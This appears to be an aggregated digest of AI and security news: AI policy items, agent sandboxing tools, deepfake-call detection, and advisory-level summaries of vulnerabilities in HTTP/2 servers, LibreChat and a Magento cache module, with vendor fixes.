All tracked items across vulnerabilities, news, research, incidents, and regulatory updates.
Wasmer engineers used Codex (an AI code generation tool) to build Edge.js, a JavaScript runtime that runs Node.js workloads inside WebAssembly (a low-level code format that runs in sandboxes for security and portability). What would have taken one year to build was completed in two weeks, allowing a small team to tackle a project previously only feasible at large companies.
Microsoft has released new security tools to control autonomous AI agents (software programs that can independently take actions like accessing files and running code) as companies adopt them in development workflows. The main offering is Microsoft Execution Container (MXC), a sandbox (an isolated environment that restricts what a program can do) that lets developers set boundaries on what resources and files agents can access. Microsoft also updated MDASH (a vulnerability research system using multiple AI agents to find security flaws) and introduced open-source governance tools to address risks from agents having too much autonomy.
OpenAI, the company behind ChatGPT (a conversational AI system), is facing competitive pressure as rival AI companies race to go public through IPOs (initial public offerings, where companies sell shares to the public for the first time) and raise large amounts of investment money. The article notes that OpenAI's CEO Sam Altman has scaled back earlier predictions about building super intelligence and reshaping society, and the company has struggled to generate revenue from ads and specialized chatbots.
This document proposes a strategy for the U.S. government to create lasting institutions that oversee frontier AI (the most advanced AI systems being developed). The plan has three main parts: build a national framework based on state laws already in place, strengthen CAISI (the federal organization responsible for frontier AI safety) as the main federal institution, and develop a broader government-wide plan to address national security and public safety risks from advanced AI.
OpenAI has published its public policy agenda centered on ensuring that artificial general intelligence (AGI, highly capable AI systems that can perform many tasks) benefits all of humanity through five core principles: democratization, empowerment, universal prosperity, resilience, and adaptability. The document outlines OpenAI's policy priorities, including a focus on frontier AI safety (protecting against risks from the most advanced AI models, particularly regarding CBRN weapons like cyber or biological threats) and support for state and federal frameworks that emphasize transparency, safety incident reporting, and developer accountability.
The UK's Competition and Markets Authority has ruled that Google must allow website publishers to opt out of AI Search features, including AI Overviews (summaries generated by AI) and prevent their content from being used to train Google's AI models. This new rule gives publishers, especially news organizations, more control over how their content is used by AI systems.
A new vulnerability called HTTP/2 Bomb affects major web servers like NGINX, Apache, Microsoft IIS, Envoy, and Cloudflare by combining two attack techniques: a compression bomb (exploiting HPACK, HTTP/2's header compression scheme) and a Slowloris-style hold (a denial-of-service attack that keeps many connections open). A single attacker on a home internet connection can exhaust a vulnerable server's memory and make it inaccessible within seconds.
LibreChat (a ChatGPT-like tool that connects to multiple AI providers) has a security flaw in versions up to 0.8.3 where someone with editing access to a shared agent can delete files globally, breaking the owner's separate private agents that use the same files. This is a cross-agent integrity violation, meaning one agent's access should not affect another agent's files.
LibreChat, a ChatGPT-like application supporting multiple AI providers, has a vulnerability in versions up to 0.8.3 where users with limited VIEW access can retrieve encrypted admin passwords and API keys through specific API endpoints, exposing credentials that should remain secret. This happens because the API returns plaintext sensitive values instead of hiding them from non-admin users.
LibreChat, a ChatGPT-like tool that works with multiple AI providers, has a vulnerability in versions up to 0.8.3 where it unsafely replaces environment variable placeholders (like ${VAR}) when validating user-provided server URLs. An authenticated attacker can create a malicious server configuration that tricks LibreChat into sending sensitive secrets like encryption keys and database credentials to an attacker-controlled server, compromising the entire installation without needing admin access.
LibreChat, a ChatGPT-like application supporting multiple AI providers, has an IDOR vulnerability (insecure direct object reference, where an attacker can access or modify resources belonging to other users) in its API key management system in versions up to 0.7.6. An authenticated attacker can inject a userId parameter to overwrite another user's API keys, potentially stealing their API key configurations or blocking their service.
Fix: Microsoft Execution Container (MXC) is positioned as the primary mitigation. According to the source, "MXC is a sandboxed code execution system for running untrusted code (model output, plugins, tools) on Windows, Linux, and macOS" that "provides multiple containment backends — from OS-native process sandboxes to full VMs — behind a unified JSON configuration schema and TypeScript SDK." The source states MXC is "a policy-driven execution workflow that lets developers specify what an AI agent can access, such as files, networks, resources, credentials, and then enforces those boundaries at runtime." Integration with Agent 365 will bring additional controls from Defender, Entra, Intune, and Purview to agent environments.
CSO OnlineSam Altman, CEO of OpenAI, has been invited by French President Macron to attend the G7 conference in June 2026, where AI is expected to be a major topic of discussion. OpenAI plans to focus on youth safety, frontier AI risks (particularly cyber and biological threats), and getting tech companies to make voluntary commitments to responsible AI development. This invitation is part of Macron's broader effort to attract major tech companies and investment to France's AI infrastructure.
Public marketplaces for AI skills (specialized add-ons that extend AI agent capabilities) are being flooded with malicious skills that steal passwords and data. Security companies have released skill scanners to detect these threats, but researchers found that these scanners are easy to bypass, sometimes in under an hour, because they rely on static detection methods that attackers can repeatedly modify to evade.
AI systems, particularly agentic AI (autonomous software that makes decisions and takes actions with minimal human oversight), are creating new security risks in enterprises by operating across systems at machine speed and collapsing traditional security boundaries. Security leaders now have board-level urgency and increased budgets to address these threats, though organizations still lack reliable ways to monitor what these AI agents are accessing and whether their actions align with company policies.
Fix: OpenAI supports state-level legislative efforts such as California SB 53, the New York RAISE Act, and Illinois SB 315, which emphasize transparency, public reporting around catastrophic-risk evaluations and safety incidents, whistleblower protections, and enforceable accountability for developers. OpenAI also supports Congressional action to establish a comprehensive federal framework that leverages state frontier safety laws, strengthens the Center for AI Standards and Innovation (CAISI) as the primary federal institution for frontier AI safety, and mobilizes a broader resilience plan across government to address national security and public safety challenges.
OpenAI BlogGoogle is rolling out a new Android security feature called 'fake call detection' that protects users from AI deepfake scam calls where scammers impersonate someone's contacts. The feature works by having a user's device send an encrypted confirmation signal when receiving a call, and if that signal is missing, it pings the actual contact's phone to verify the call is real, warning the user to hang up if the contact's device confirms they're not calling.
Fix: Google's mitigation is built into the new 'fake call detection' feature, which is rolling out globally this month to Android 12 and later devices (starting with Pixel devices) and enabled by default. The feature requires Phone by Google, Contacts, and Google Messages (with RCS, or Rich Communication Services, enabled) to be installed. Google also stated: 'If your device uses a different app, you can install Phone by Google from the Play Store and set it as your default phone app to help protect yourself from fake calls.'
BleepingComputerFix: NGINX: Upgrade to version 1.29.8 or later, which adds the max_headers directive with a default of 1000. Alternatively, disable HTTP/2 with http2 off;. Apache HTTPD: Upgrade mod_http2 to version 2.0.41 or later. Alternatively, set Protocols http/1.1 to disable HTTP/2. Microsoft IIS, Envoy, and Cloudflare Pingora: No patch available as of the article's writing date.
The Hacker NewsDebapt is a system that uses multiple AI agents (independent AI programs that work together) debating with each other to build profiles of APT (advanced persistent threat, a sophisticated type of cyberattack) adversaries by analyzing cyber threat intelligence (information about security threats). The system uses an ontology (a formal structure that defines how concepts relate to each other) to organize this debate process. This research proposes a new way to understand and track advanced attackers by having AI agents discuss and reason through threat data together.
Anthropic expanded its Project Glasswing (an AI-based vulnerability hunting initiative that finds security bugs in software) to 150 more companies, especially those in critical infrastructure like power and healthcare. However, security experts warn this creates a bottleneck problem: if AI finds vulnerabilities 10 or more times faster than before, companies may not be able to validate, prioritize, patch, and deploy fixes quickly enough, potentially overwhelming security teams rather than actually improving defense.
This research paper presents a method for detecting deepfakes (synthetic videos or images created by AI to look realistic) using a dual-mode Swin Transformer, which is a type of neural network architecture. The approach uses multi-scale feature learning (analyzing visual details at different zoom levels) and local ambiguity mitigation (reducing confusion in uncertain areas) to improve detection accuracy. This is a technical contribution to security research, not a response to an existing vulnerability or security incident.
Mirasvit Full Page Cache Warmer contains a deserialization vulnerability (a flaw where untrusted data is converted back into executable code), allowing attackers without authentication to run arbitrary commands on affected systems by sending a malicious serialized PHP object (a packaged piece of code) through the CacheWarmer cookie. This vulnerability is currently being exploited in active attacks.
Fix: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable. See vendor changelog at https://mirasvit.com/package/changelog/?package=mirasvit/module-cache-warmer for available patches.
CISA Known Exploited VulnerabilitiesPalo Alto Networks CEO Nikesh Arora reported a surge in customer meetings, with the company fielding roughly 1,200 inquiries in recent weeks from organizations seeking guidance on AI security risks. The article notes that AI-powered attacks are becoming more sophisticated, making cybersecurity more important for companies, and that earlier investor concerns about AI disrupting cybersecurity companies appear to have been overblown.
Fix: Version 0.8.4 contains a patch.
NVD/CVE DatabaseFix: Version 0.8.4 contains a patch. The source also recommends these additional approaches: never return decrypted admin-managed secrets to non-owners; redact apiKey.key and oauth.client_secret from all API responses; consider returning only boolean presence indicators for secrets (true/false flags showing whether a secret exists, similar to the auth-values route pattern); and if owners need to edit configs without re-entering secrets, preserve secrets server-side and return placeholders instead of plaintext values.
NVD/CVE DatabaseFix: This is patched in version 0.8.4-rc1.
NVD/CVE DatabaseFix: This vulnerability is patched in version 0.8.3-rc1.
NVD/CVE Database